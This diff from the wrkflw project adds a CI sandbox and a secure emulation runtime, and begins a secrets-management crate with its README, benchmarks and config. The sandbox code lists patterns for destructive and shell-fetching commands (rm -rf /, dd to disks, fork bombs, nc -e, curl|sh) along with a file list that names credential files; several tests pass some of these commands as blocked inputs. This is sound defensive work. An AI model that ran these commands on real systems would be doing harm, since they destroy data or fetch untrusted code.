                    timeout_duration.as_secs_f64()
                ));
                Err(SandboxError::ExecutionTimeout {
                    seconds: timeout_duration.as_secs(),
                })
            }
        }
    }

    /// Check if a path is allowed for access
    fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
        let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());

        if write_access {
            self.config
                .allowed_write_paths
                .iter()
                .any(|allowed| abs_path.starts_with(allowed))
        } else {
            self.config
                .allowed_read_paths
                .iter()
                .any(|allowed| abs_path.starts_with(allowed))
                || self
                    .config
                    .allowed_write_paths
                    .iter()
                    .any(|allowed| abs_path.starts_with(allowed))
        }
    }

    /// Check if an environment variable is safe to pass through
    fn is_env_var_safe(&self, key: &str) -> bool {
        // Block dangerous environment variables
        let dangerous_env_vars = [
            "LD_PRELOAD",
            "LD_LIBRARY_PATH",
            "DYLD_INSERT_LIBRARIES",
            "DYLD_LIBRARY_PATH",
            "PATH",
            "HOME",
            "SHELL",
        ];

        !dangerous_env_vars.contains(&key)
    }

    /// Check if a file should be skipped during copying
    fn should_skip_file(&self, filename: &str) -> bool {
        let dangerous_files = [
            ".ssh",
            ".gnupg",
            ".aws",
            ".docker",
            "id_rsa",
            "id_ed25519",
            "credentials",
            "config",
            ".env",
            ".secrets",
        ];

        dangerous_files
            .iter()
            .any(|pattern| filename.contains(pattern))
            || filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
    }

    /// Check if a directory should be skipped
    fn should_skip_directory(&self, dirname: &str) -> bool {
        let skip_dirs = [
            "target",
            "node_modules",
            ".git",
            ".cargo",
            ".npm",
            ".cache",
            "build",
            "dist",
            "tmp",
            "temp",
        ];

        skip_dirs.contains(&dirname)
    }

    /// Compile regex patterns for dangerous command detection
    fn compile_dangerous_patterns() -> Vec<Regex> {
        let patterns = [
            r"rm\s+.*-rf?\s*/",       // rm -rf /
            r"dd\s+.*of=/dev/",       // dd ... of=/dev/...
            r">\s*/dev/sd[a-z]",      // > /dev/sda
            r"mkfs\.",                // mkfs.ext4, etc.
            r"fdisk\s+/dev/",         // fdisk /dev/...
            r"mount\s+.*\s+/",        // mount ... /
            r"chroot\s+/",            // chroot /
            r"sudo\s+",               // sudo commands
            r"su\s+",                 // su commands
            r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
            r"sh\s+-c\s+.*rm.*-rf",   // sh -c "rm -rf ..."
            r"eval\s+.*rm.*-rf",      // eval "rm -rf ..."
            r":\(\)\{.*;\};:",        // Fork bomb
            r"/proc/sys/",            // /proc/sys access
            r"/etc/passwd",           // /etc/passwd access
            r"/etc/shadow",           // /etc/shadow access
            r"nc\s+.*-e",             // netcat with exec
            r"wget\s+.*\|\s*sh",      // wget ... | sh
            r"curl\s+.*\|\s*sh",      // curl ... | sh
        ];

        patterns
            .iter()
            .filter_map(|pattern| {
                Regex::new(pattern)
                    .map_err(|e| {
                        wrkflw_logging::warning(&format!(
                            "Invalid regex pattern {}: {}",
                            pattern, e
                        ));
                        e
                    })
                    .ok()
            })
            .collect()
    }
}

/// Create a default sandbox configuration for CI/CD workflows
pub fn create_workflow_sandbox_config() -> SandboxConfig {
    let mut allowed_read_paths = HashSet::new();
    allowed_read_paths.insert(PathBuf::from("."));

    let mut allowed_write_paths = HashSet::new();
    allowed_write_paths.insert(PathBuf::from("."));

    SandboxConfig {
        max_execution_time: Duration::from_secs(1800), // 30 minutes
        max_memory_mb: 2048,                           // 2GB
        max_processes: 50,
        allow_network: true,
        strict_mode: false,
        allowed_read_paths,
        allowed_write_paths,
        ..Default::default()
    }
}

/// Create a strict sandbox configuration for untrusted code
pub fn create_strict_sandbox_config() -> SandboxConfig {
    let mut allowed_read_paths = HashSet::new();
    allowed_read_paths.insert(PathBuf::from("."));

    let mut allowed_write_paths = HashSet::new();
    allowed_write_paths.insert(PathBuf::from("."));

    // Very limited command set
    let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
        .iter()
        .map(|s| s.to_string())
        .collect();

    SandboxConfig {
        max_execution_time: Duration::from_secs(60), // 1 minute
        max_memory_mb: 128,                          // 128MB
        max_processes: 5,
        allow_network: false,
        strict_mode: true,
        allowed_read_paths,
        allowed_write_paths,
        allowed_commands,
        ..Default::default()
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_dangerous_pattern_detection() {
        let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();

        // Should block dangerous commands
        assert!(sandbox.validate_command("rm -rf /").is_err());
        assert!(sandbox
            .validate_command("dd if=/dev/zero of=/dev/sda")
            .is_err());
        assert!(sandbox.validate_command("sudo rm -rf /home").is_err());
        assert!(sandbox.validate_command("bash -c 'rm -rf /'").is_err());

        // Should allow safe commands
        assert!(sandbox.validate_command("echo hello").is_ok());
        assert!(sandbox.validate_command("ls -la").is_ok());
        assert!(sandbox.validate_command("cargo build").is_ok());
    }

    #[test]
    fn test_command_whitelist() {
        let config = create_strict_sandbox_config();
        let sandbox = Sandbox::new(config).unwrap();

        // Should allow whitelisted commands
        assert!(sandbox.validate_command("echo hello").is_ok());
        assert!(sandbox.validate_command("ls").is_ok());

        // Should block non-whitelisted commands
        assert!(sandbox.validate_command("git clone").is_err());
        assert!(sandbox.validate_command("cargo build").is_err());
    }

    #[test]
    fn test_file_filtering() {
        let sandbox = Sandbox::new(SandboxConfig::default()).unwrap();

        // Should skip dangerous files
        assert!(sandbox.should_skip_file("id_rsa"));
        assert!(sandbox.should_skip_file(".ssh"));
        assert!(sandbox.should_skip_file("credentials"));

        // Should allow safe files
        assert!(!sandbox.should_skip_file("Cargo.toml"));
        assert!(!sandbox.should_skip_file("README.md"));
        assert!(!sandbox.should_skip_file(".gitignore"));
    }
}
339
crates/runtime/src/secure_emulation.rs
Normal file
@@ -0,0 +1,339 @@
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
use crate::sandbox::{create_workflow_sandbox_config, Sandbox, SandboxConfig, SandboxError};
use async_trait::async_trait;
use std::path::Path;
use wrkflw_logging;

/// Secure emulation runtime that uses sandboxing for safety
pub struct SecureEmulationRuntime {
    sandbox: Sandbox,
}

impl Default for SecureEmulationRuntime {
    fn default() -> Self {
        Self::new()
    }
}

impl SecureEmulationRuntime {
    /// Create a new secure emulation runtime with default workflow-friendly configuration
    pub fn new() -> Self {
        let config = create_workflow_sandbox_config();
        let sandbox = Sandbox::new(config).expect("Failed to create sandbox");

        wrkflw_logging::info("🔒 Initialized secure emulation runtime with sandboxing");

        Self { sandbox }
    }

    /// Create a new secure emulation runtime with custom sandbox configuration
    pub fn new_with_config(config: SandboxConfig) -> Result<Self, ContainerError> {
        let sandbox = Sandbox::new(config).map_err(|e| {
            ContainerError::ContainerStart(format!("Failed to create sandbox: {}", e))
        })?;

        wrkflw_logging::info("🔒 Initialized secure emulation runtime with custom config");

        Ok(Self { sandbox })
    }
}

#[async_trait]
impl ContainerRuntime for SecureEmulationRuntime {
    async fn run_container(
        &self,
        image: &str,
        command: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
        _volumes: &[(&Path, &Path)],
    ) -> Result<ContainerOutput, ContainerError> {
        wrkflw_logging::info(&format!(
            "🔒 Executing sandboxed command: {} (image: {})",
            command.join(" "),
            image
        ));

        // Use sandbox to execute the command safely
        let result = self
            .sandbox
            .execute_command(command, env_vars, working_dir)
            .await;

        match result {
            Ok(output) => {
                wrkflw_logging::info("✅ Sandboxed command completed successfully");
                Ok(output)
            }
            Err(SandboxError::BlockedCommand { command }) => {
                let error_msg = format!(
                    "🚫 SECURITY BLOCK: Command '{}' is not allowed in secure emulation mode. \
                     This command was blocked for security reasons. \
                     If you need to run this command, please use Docker or Podman mode instead.",
                    command
                );
                wrkflw_logging::warning(&error_msg);
                Err(ContainerError::ContainerExecution(error_msg))
            }
            Err(SandboxError::DangerousPattern { pattern }) => {
                let error_msg = format!(
                    "🚫 SECURITY BLOCK: Dangerous command pattern detected: '{}'. \
                     This command was blocked because it matches a known dangerous pattern. \
                     Please review your workflow for potentially harmful commands.",
                    pattern
                );
                wrkflw_logging::warning(&error_msg);
                Err(ContainerError::ContainerExecution(error_msg))
            }
            Err(SandboxError::ExecutionTimeout { seconds }) => {
                let error_msg = format!(
                    "⏰ Command execution timed out after {} seconds. \
                     Consider optimizing your command or increasing timeout limits.",
                    seconds
                );
                wrkflw_logging::warning(&error_msg);
                Err(ContainerError::ContainerExecution(error_msg))
            }
            Err(SandboxError::PathAccessDenied { path }) => {
                let error_msg = format!(
                    "🚫 Path access denied: '{}'. \
                     The sandbox restricts file system access for security.",
                    path
                );
                wrkflw_logging::warning(&error_msg);
                Err(ContainerError::ContainerExecution(error_msg))
            }
            Err(SandboxError::ResourceLimitExceeded { resource }) => {
                let error_msg = format!(
                    "📊 Resource limit exceeded: {}. \
                     Your command used too many system resources.",
                    resource
                );
                wrkflw_logging::warning(&error_msg);
                Err(ContainerError::ContainerExecution(error_msg))
            }
            Err(e) => {
                let error_msg = format!("Sandbox execution failed: {}", e);
                wrkflw_logging::error(&error_msg);
                Err(ContainerError::ContainerExecution(error_msg))
            }
        }
    }

    async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
        wrkflw_logging::info(&format!(
            "🔒 Secure emulation: Pretending to pull image {}",
            image
        ));
        Ok(())
    }

    async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
        wrkflw_logging::info(&format!(
            "🔒 Secure emulation: Pretending to build image {} from {}",
            tag,
            dockerfile.display()
        ));
        Ok(())
    }

    async fn prepare_language_environment(
        &self,
        language: &str,
        version: Option<&str>,
        _additional_packages: Option<Vec<String>>,
    ) -> Result<String, ContainerError> {
        // For secure emulation runtime, we'll use a simplified approach
        // that doesn't require building custom images
        let base_image = match language {
            "python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
            "node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
            "java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| {
                format!("eclipse-temurin:{}", v)
            }),
            "go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
            "dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| {
                format!("mcr.microsoft.com/dotnet/sdk:{}", v)
            }),
            "rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
            _ => {
                return Err(ContainerError::ContainerStart(format!(
                    "Unsupported language: {}",
                    language
                )))
            }
        };

        // For emulation, we'll just return the base image
        // The actual package installation will be handled during container execution
        Ok(base_image)
    }
}

/// Handle special actions in secure emulation mode
pub async fn handle_special_action_secure(action: &str) -> Result<(), ContainerError> {
    // Extract owner, repo and version from the action
    let action_parts: Vec<&str> = action.split('@').collect();
    let action_name = action_parts[0];
    let action_version = if action_parts.len() > 1 {
        action_parts[1]
    } else {
        "latest"
    };

    wrkflw_logging::info(&format!(
        "🔒 Processing action in secure mode: {} @ {}",
        action_name, action_version
    ));

    // In secure mode, we're more restrictive about what actions we allow
    match action_name {
        // Core GitHub actions that are generally safe
        name if name.starts_with("actions/checkout") => {
            wrkflw_logging::info("✅ Checkout action - workspace files are prepared securely");
        }
        name if name.starts_with("actions/setup-node") => {
            wrkflw_logging::info("🟡 Node.js setup - using system Node.js in secure mode");
            check_command_available_secure("node", "Node.js", "https://nodejs.org/");
        }
        name if name.starts_with("actions/setup-python") => {
            wrkflw_logging::info("🟡 Python setup - using system Python in secure mode");
            check_command_available_secure("python", "Python", "https://www.python.org/downloads/");
        }
        name if name.starts_with("actions/setup-java") => {
            wrkflw_logging::info("🟡 Java setup - using system Java in secure mode");
            check_command_available_secure("java", "Java", "https://adoptium.net/");
        }
        name if name.starts_with("actions/cache") => {
            wrkflw_logging::info("🟡 Cache action - caching disabled in secure emulation mode");
        }

        // Rust-specific actions
        name if name.starts_with("actions-rs/cargo") => {
            wrkflw_logging::info("🟡 Rust cargo action - using system Rust in secure mode");
            check_command_available_secure("cargo", "Rust/Cargo", "https://rustup.rs/");
        }
        name if name.starts_with("actions-rs/toolchain") => {
            wrkflw_logging::info("🟡 Rust toolchain action - using system Rust in secure mode");
            check_command_available_secure("rustc", "Rust", "https://rustup.rs/");
        }
        name if name.starts_with("actions-rs/fmt") => {
            wrkflw_logging::info("🟡 Rust formatter action - using system rustfmt in secure mode");
            check_command_available_secure("rustfmt", "rustfmt", "rustup component add rustfmt");
        }

        // Potentially dangerous actions that we warn about
        name if name.contains("docker") || name.contains("container") => {
            wrkflw_logging::warning(&format!(
                "🚫 Docker/container action '{}' is not supported in secure emulation mode. \
                 Use Docker or Podman mode for container actions.",
                action_name
            ));
        }
        name if name.contains("ssh") || name.contains("deploy") => {
            wrkflw_logging::warning(&format!(
                "🚫 SSH/deployment action '{}' is restricted in secure emulation mode. \
                 Use Docker or Podman mode for deployment actions.",
                action_name
            ));
        }

        // Unknown actions
        _ => {
            wrkflw_logging::warning(&format!(
                "🟡 Unknown action '{}' in secure emulation mode. \
                 Some functionality may be limited or unavailable.",
                action_name
            ));
        }
    }

    Ok(())
}

/// Check if a command is available, with security-focused messaging
fn check_command_available_secure(command: &str, name: &str, install_url: &str) {
    use std::process::Command;

    let is_available = Command::new("which")
        .arg(command)
        .output()
        .map(|output| output.status.success())
        .unwrap_or(false);

    if !is_available {
        wrkflw_logging::warning(&format!(
            "🔧 {} is required but not found on the system",
            name
        ));
        wrkflw_logging::info(&format!(
            "To use this action in secure mode, please install {}: {}",
            name, install_url
        ));
        wrkflw_logging::info(&format!(
            "Alternatively, use Docker or Podman mode for automatic {} installation",
            name
        ));
    } else {
        // Try to get version information
        if let Ok(output) = Command::new(command).arg("--version").output() {
            if output.status.success() {
                let version = String::from_utf8_lossy(&output.stdout);
                wrkflw_logging::info(&format!(
                    "✅ Using system {} in secure mode: {}",
                    name,
                    version.trim()
                ));
            }
        }
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::sandbox::create_strict_sandbox_config;
    use std::path::PathBuf;

    #[tokio::test]
    async fn test_secure_emulation_blocks_dangerous_commands() {
        let config = create_strict_sandbox_config();
        let runtime = SecureEmulationRuntime::new_with_config(config).unwrap();

        // Should block dangerous commands
        let result = runtime
            .run_container(
                "alpine:latest",
                &["rm", "-rf", "/"],
                &[],
                &PathBuf::from("."),
                &[],
            )
            .await;

        assert!(result.is_err());
        let error_msg = result.unwrap_err().to_string();
        assert!(error_msg.contains("SECURITY BLOCK"));
    }

    #[tokio::test]
    async fn test_secure_emulation_allows_safe_commands() {
        let runtime = SecureEmulationRuntime::new();

        // Should allow safe commands
        let result = runtime
            .run_container(
                "alpine:latest",
                &["echo", "hello world"],
                &[],
                &PathBuf::from("."),
                &[],
            )
            .await;

        assert!(result.is_ok());
        let output = result.unwrap();
        assert!(output.stdout.contains("hello world"));
        assert_eq!(output.exit_code, 0);
    }
}
61
crates/secrets/Cargo.toml
Normal file
@@ -0,0 +1,61 @@
[package]
name = "wrkflw-secrets"
version.workspace = true
edition.workspace = true
description = "Secrets management for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# External dependencies
serde.workspace = true
serde_json.workspace = true
serde_yaml.workspace = true
tokio.workspace = true
thiserror.workspace = true
dirs.workspace = true
regex.workspace = true
lazy_static.workspace = true
chrono = { workspace = true, features = ["serde"] }
async-trait.workspace = true

# Dependencies not in workspace
anyhow = "1.0"
base64 = "0.21"
aes-gcm = "0.10"
rand = "0.8"
tracing = "0.1"
url = "2.4"
pbkdf2 = "0.12"
hmac = "0.12"
sha2 = "0.10"

# Optional dependencies for different secret providers (commented out for compatibility)
# reqwest = { version = "0.11", features = ["json"], optional = true }
# aws-sdk-secretsmanager = { version = "1.0", optional = true }
# azure_security_keyvault = { version = "0.16", optional = true }

[features]
default = ["env-provider", "file-provider"]
env-provider = []
file-provider = []
# Cloud provider features are planned for future implementation
# vault-provider = ["reqwest"]
# aws-provider = ["aws-sdk-secretsmanager", "reqwest"]
# azure-provider = ["azure_security_keyvault", "reqwest"]
# gcp-provider = ["reqwest"]
# all-providers = ["vault-provider", "aws-provider", "azure-provider", "gcp-provider"]

[dev-dependencies]
tempfile.workspace = true
tokio-test = "0.4"
uuid.workspace = true
criterion = { version = "0.5", features = ["html_reports"] }

[[bench]]
name = "masking_bench"
harness = false
387 crates/secrets/README.md Normal file
@@ -0,0 +1,387 @@
# wrkflw-secrets

Comprehensive secrets management for wrkflw workflow execution. This crate provides secure handling of secrets with support for multiple providers, encryption, masking, and GitHub Actions-compatible variable substitution.

## Features

- **Multiple Secret Providers**: Environment variables and files today; HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, and Google Cloud Secret Manager are planned
- **Secure Storage**: AES-256-GCM encryption for secrets at rest
- **Variable Substitution**: GitHub Actions-compatible `${{ secrets.* }}` syntax
- **Secret Masking**: Automatic masking of secrets in logs and output with pattern detection
- **Caching**: Optional caching with TTL for performance optimization
- **Rate Limiting**: Built-in protection against secret access abuse
- **Input Validation**: Comprehensive validation of secret names and values
- **Health Checks**: Provider health monitoring and diagnostics
- **Configuration**: Flexible YAML/JSON configuration with environment variable support
- **Thread Safety**: Full async/await support with concurrent access
- **Performance Optimized**: Compiled regex patterns and caching for high-throughput scenarios

## Quick Start

```rust
use wrkflw_secrets::prelude::*;

#[tokio::main]
async fn main() -> SecretResult<()> {
    // Create a secret manager with default configuration
    let manager = SecretManager::default().await?;

    // Set an environment variable
    std::env::set_var("GITHUB_TOKEN", "ghp_your_token_here");

    // Get a secret
    let secret = manager.get_secret("GITHUB_TOKEN").await?;
    println!("Token: {}", secret.value());

    // Use secret substitution
    let mut substitution = SecretSubstitution::new(&manager);
    let template = "curl -H 'Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' https://api.github.com";
    let resolved = substitution.substitute(template).await?;

    // Mask secrets in logs
    let mut masker = SecretMasker::new();
    masker.add_secret(secret.value());
    let safe_log = masker.mask(&resolved);
    println!("Safe log: {}", safe_log);

    Ok(())
}
```

## Configuration

### Environment Variables

```bash
# Set default provider
export WRKFLW_DEFAULT_SECRET_PROVIDER=env

# Enable/disable secret masking
export WRKFLW_SECRET_MASKING=true

# Set operation timeout
export WRKFLW_SECRET_TIMEOUT=30
```

### Configuration File

Create `~/.wrkflw/secrets.yml`:

```yaml
default_provider: env
enable_masking: true
timeout_seconds: 30
enable_caching: true
cache_ttl_seconds: 300

providers:
  env:
    type: environment
    prefix: "WRKFLW_SECRET_"

  file:
    type: file
    path: "~/.wrkflw/secrets.json"

  vault:
    type: vault
    url: "https://vault.example.com"
    auth:
      method: token
      token: "${VAULT_TOKEN}"
    mount_path: "secret"
```
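A configuration file like the one above can then be loaded explicitly in code. A minimal sketch (the path is illustrative, and `SecretConfig::from_file` reads the path as given, so pass an expanded path rather than a literal `~`):

```rust
use wrkflw_secrets::{SecretConfig, SecretManager};

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    // .json, .yml, and .yaml extensions are supported
    let config = SecretConfig::from_file("/home/user/.wrkflw/secrets.yml")?;
    let manager = SecretManager::new(config).await?;
    println!("Configured providers: {:?}", manager.provider_names());
    Ok(())
}
```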
## Secret Providers

### Environment Variables

The simplest provider reads secrets from environment variables:

```rust
// With prefix
std::env::set_var("WRKFLW_SECRET_API_KEY", "secret_value");
let secret = manager.get_secret_from_provider("env", "API_KEY").await?;

// Without prefix
std::env::set_var("GITHUB_TOKEN", "ghp_token");
let secret = manager.get_secret_from_provider("env", "GITHUB_TOKEN").await?;
```

### File-based Storage

Store secrets in JSON, YAML, or environment files:

**JSON format** (`secrets.json`):
```json
{
  "API_KEY": "secret_api_key",
  "DB_PASSWORD": "secret_password"
}
```

**Environment format** (`secrets.env`):
```bash
API_KEY=secret_api_key
DB_PASSWORD="quoted password"
GITHUB_TOKEN='single quoted token'
```

**YAML format** (`secrets.yml`):
```yaml
API_KEY: secret_api_key
DB_PASSWORD: secret_password
```
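With one of these files in place, values are read through the `file` provider by name. A short sketch, assuming `manager` was built with a `file` provider pointing at the JSON file above:

```rust
// Reads "API_KEY" from the configured secrets file
let secret = manager.get_secret_from_provider("file", "API_KEY").await?;
println!("API key loaded ({} bytes)", secret.value().len());
```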
### HashiCorp Vault

Vault support is planned; this snippet and the AWS, Azure, and GCP snippets below show the intended configuration shape.

```yaml
providers:
  vault:
    type: vault
    url: "https://vault.example.com"
    auth:
      method: token
      token: "${VAULT_TOKEN}"
    mount_path: "secret"
```

### AWS Secrets Manager

```yaml
providers:
  aws:
    type: aws_secrets_manager
    region: "us-east-1"
    role_arn: "arn:aws:iam::123456789012:role/SecretRole" # optional
```

### Azure Key Vault

```yaml
providers:
  azure:
    type: azure_key_vault
    vault_url: "https://myvault.vault.azure.net/"
    auth:
      method: service_principal
      client_id: "${AZURE_CLIENT_ID}"
      client_secret: "${AZURE_CLIENT_SECRET}"
      tenant_id: "${AZURE_TENANT_ID}"
```

### Google Cloud Secret Manager

```yaml
providers:
  gcp:
    type: gcp_secret_manager
    project_id: "my-project"
    key_file: "/path/to/service-account.json" # optional
```

## Variable Substitution

Support for GitHub Actions-compatible secret references:

```rust
let mut substitution = SecretSubstitution::new(&manager);

// Default provider
let template = "TOKEN=${{ secrets.GITHUB_TOKEN }}";
let resolved = substitution.substitute(template).await?;

// Specific provider
let template = "API_KEY=${{ secrets.vault:API_KEY }}";
let resolved = substitution.substitute(template).await?;
```

## Secret Masking

Automatically mask secrets in logs and output:

```rust
let mut masker = SecretMasker::new();

// Add specific secrets
masker.add_secret("secret_value");

// Automatic pattern detection for common secret types
let log = "Token: ghp_123456789012345678901234567890123456";
let masked = masker.mask(log);
// Output: "Token: ghp_***"
```

Supported patterns (see the detection example after this list):
- GitHub Personal Access Tokens (`ghp_*`)
- GitHub App tokens (`ghs_*`)
- GitHub OAuth tokens (`gho_*`)
- AWS Access Keys (`AKIA*`)
- JWT tokens
- Generic API keys
## Encrypted Storage

For sensitive environments, use encrypted storage:

```rust
use wrkflw_secrets::storage::{EncryptedSecretStore, KeyDerivation};

// Create encrypted store
let (mut store, key) = EncryptedSecretStore::new()?;

// Add secrets
store.add_secret(&key, "API_KEY", "secret_value")?;

// Save to file
store.save_to_file("secrets.encrypted").await?;

// Load from file
let loaded_store = EncryptedSecretStore::load_from_file("secrets.encrypted").await?;
let secret = loaded_store.get_secret(&key, "API_KEY")?;
```

## Error Handling

All operations return `SecretResult<T>` with comprehensive error types:

```rust
match manager.get_secret("MISSING_SECRET").await {
    Ok(secret) => println!("Secret: {}", secret.value()),
    Err(SecretError::NotFound { name }) => {
        eprintln!("Secret '{}' not found", name);
    }
    Err(SecretError::ProviderNotFound { provider }) => {
        eprintln!("Provider '{}' not configured", provider);
    }
    Err(SecretError::AuthenticationFailed { provider, reason }) => {
        eprintln!("Auth failed for {}: {}", provider, reason);
    }
    Err(e) => eprintln!("Error: {}", e),
}
```

## Health Checks

Monitor provider health:

```rust
let health_results = manager.health_check().await;
for (provider, result) in health_results {
    match result {
        Ok(()) => println!("✓ {} is healthy", provider),
        Err(e) => println!("✗ {} failed: {}", provider, e),
    }
}
```

## Security Best Practices

1. **Use encryption** for secrets at rest
2. **Enable masking** to prevent secrets in logs
3. **Rotate secrets** regularly
4. **Use least privilege** access for secret providers
5. **Monitor access** through health checks and logging
6. **Use provider-specific authentication** (IAM roles, service principals)
7. **Configure rate limiting** to prevent abuse (see the configuration sketch after this list)
8. **Validate input** - the system automatically validates secret names and values
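Several of these practices map directly onto `SecretConfig`. An illustrative combination (the values are examples, not recommended defaults):

```rust
use std::time::Duration;
use wrkflw_secrets::rate_limit::RateLimitConfig;
use wrkflw_secrets::SecretConfig;

let config = SecretConfig {
    enable_masking: true,  // practice 2: keep secrets out of logs
    enable_caching: true,
    cache_ttl_seconds: 60, // short TTL limits exposure of rotated secrets
    rate_limit: RateLimitConfig {
        max_requests: 50,  // practice 7: bound access per window
        window_duration: Duration::from_secs(60),
        enabled: true,
    },
    ..Default::default()
};
```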
## Rate Limiting

Protect against abuse with built-in rate limiting:

```rust
use wrkflw_secrets::rate_limit::RateLimitConfig;
use std::time::Duration;

let mut config = SecretConfig::default();
config.rate_limit = RateLimitConfig {
    max_requests: 100,                        // Max requests per window
    window_duration: Duration::from_secs(60), // 1 minute window
    enabled: true,
};

let manager = SecretManager::new(config).await?;

// Rate limiting is automatically applied to all secret access operations
match manager.get_secret("API_KEY").await {
    Ok(secret) => println!("Success: {}", secret.value()),
    Err(SecretError::RateLimitExceeded(msg)) => {
        println!("Rate limited: {}", msg);
    }
    Err(e) => println!("Other error: {}", e),
}
```

## Input Validation

All inputs are automatically validated:

```rust
// Secret names must:
// - Be 1-255 characters long
// - Contain only letters, numbers, underscores, hyphens, and dots
// - Not start or end with dots
// - Not contain consecutive dots
// - Not be reserved system names

// Secret values must:
// - Be under 1MB in size
// - Not contain null bytes
// - Be valid UTF-8

// Invalid examples that will be rejected:
manager.get_secret("").await;             // Empty name
manager.get_secret("invalid/name").await; // Invalid characters
manager.get_secret(".hidden").await;      // Starts with dot
manager.get_secret("CON").await;          // Reserved name
```

## Performance Features

### Caching

```rust
let config = SecretConfig {
    enable_caching: true,
    cache_ttl_seconds: 300, // 5 minutes
    ..Default::default()
};
```

### Optimized Pattern Matching

- Pre-compiled regex patterns for secret detection (sketched below)
- Global pattern cache using `OnceLock`
- Efficient string replacement algorithms
- Cached mask generation
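Internally this looks roughly like the following, simplified from the crate's `masking` module down to a single pattern:

```rust
use regex::Regex;
use std::sync::OnceLock;

struct CompiledPatterns {
    github_pat: Regex,
}

impl CompiledPatterns {
    fn new() -> Self {
        Self {
            github_pat: Regex::new(r"ghp_[a-zA-Z0-9]{36}").unwrap(),
        }
    }
}

// Compiled once on first use, then shared by every masking call
static PATTERNS: OnceLock<CompiledPatterns> = OnceLock::new();

fn mask_patterns(text: &str) -> String {
    let patterns = PATTERNS.get_or_init(CompiledPatterns::new);
    patterns.github_pat.replace_all(text, "ghp_***").to_string()
}
```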
### Benchmarking

Run performance benchmarks:

```bash
cargo bench -p wrkflw-secrets
```

## Feature Flags

Enable optional providers:

```toml
[dependencies]
wrkflw-secrets = { version = "0.1", features = ["vault-provider", "aws-provider"] }
```

Available features:
- `env-provider` (default)
- `file-provider` (default)
- `vault-provider` (planned)
- `aws-provider` (planned)
- `azure-provider` (planned)
- `gcp-provider` (planned)
- `all-providers` (planned)

## License

MIT License - see LICENSE file for details.
92 crates/secrets/benches/masking_bench.rs Normal file
@@ -0,0 +1,92 @@
// Copyright 2024 wrkflw contributors
// SPDX-License-Identifier: MIT

//! Benchmarks for secret masking performance

use criterion::{black_box, criterion_group, criterion_main, Criterion};
use wrkflw_secrets::SecretMasker;

fn bench_basic_masking(c: &mut Criterion) {
    let mut masker = SecretMasker::new();
    masker.add_secret("password123");
    masker.add_secret("api_key_abcdef123456");
    masker.add_secret("super_secret_value_that_should_be_masked");

    let text = "The password is password123 and the API key is api_key_abcdef123456. Also super_secret_value_that_should_be_masked is here.";

    c.bench_function("basic_masking", |b| b.iter(|| masker.mask(black_box(text))));
}

fn bench_pattern_masking(c: &mut Criterion) {
    let masker = SecretMasker::new();

    let text = "GitHub token: ghp_1234567890123456789012345678901234567890 and AWS key: AKIAIOSFODNN7EXAMPLE";

    c.bench_function("pattern_masking", |b| {
        b.iter(|| masker.mask(black_box(text)))
    });
}

fn bench_large_text_masking(c: &mut Criterion) {
    let mut masker = SecretMasker::new();
    masker.add_secret("secret123");
    masker.add_secret("password456");

    // Create a large text with secrets scattered throughout
    let mut large_text = String::new();
    for i in 0..1000 {
        large_text.push_str(&format!(
            "Line {}: Some normal text here with secret123 and password456 mixed in. ",
            i
        ));
    }

    c.bench_function("large_text_masking", |b| {
        b.iter(|| masker.mask(black_box(&large_text)))
    });
}

fn bench_many_secrets(c: &mut Criterion) {
    let mut masker = SecretMasker::new();

    // Add many secrets
    for i in 0..100 {
        masker.add_secret(format!("secret_{}", i));
    }

    let text = "This text contains secret_50 and secret_75 but not others.";

    c.bench_function("many_secrets", |b| b.iter(|| masker.mask(black_box(text))));
}

fn bench_contains_secrets(c: &mut Criterion) {
    let mut masker = SecretMasker::new();
    masker.add_secret("password123");
    masker.add_secret("api_key_abcdef123456");

    let text_with_secrets = "The password is password123";
    let text_without_secrets = "Just some normal text";
    let text_with_patterns = "GitHub token: ghp_1234567890123456789012345678901234567890";

    c.bench_function("contains_secrets_with", |b| {
        b.iter(|| masker.contains_secrets(black_box(text_with_secrets)))
    });

    c.bench_function("contains_secrets_without", |b| {
        b.iter(|| masker.contains_secrets(black_box(text_without_secrets)))
    });

    c.bench_function("contains_secrets_patterns", |b| {
        b.iter(|| masker.contains_secrets(black_box(text_with_patterns)))
    });
}

criterion_group!(
    benches,
    bench_basic_masking,
    bench_pattern_masking,
    bench_large_text_masking,
    bench_many_secrets,
    bench_contains_secrets
);
criterion_main!(benches);
203 crates/secrets/src/config.rs Normal file
@@ -0,0 +1,203 @@
use crate::rate_limit::RateLimitConfig;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;

/// Configuration for the secrets management system
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SecretConfig {
    /// Default secret provider to use when none is specified
    pub default_provider: String,

    /// Configuration for each secret provider
    pub providers: HashMap<String, SecretProviderConfig>,

    /// Whether to enable secret masking in logs
    pub enable_masking: bool,

    /// Timeout for secret operations in seconds
    pub timeout_seconds: u64,

    /// Whether to cache secrets for performance
    pub enable_caching: bool,

    /// Cache TTL in seconds
    pub cache_ttl_seconds: u64,

    /// Rate limiting configuration
    #[serde(skip)]
    pub rate_limit: RateLimitConfig,
}

impl Default for SecretConfig {
    fn default() -> Self {
        let mut providers = HashMap::new();

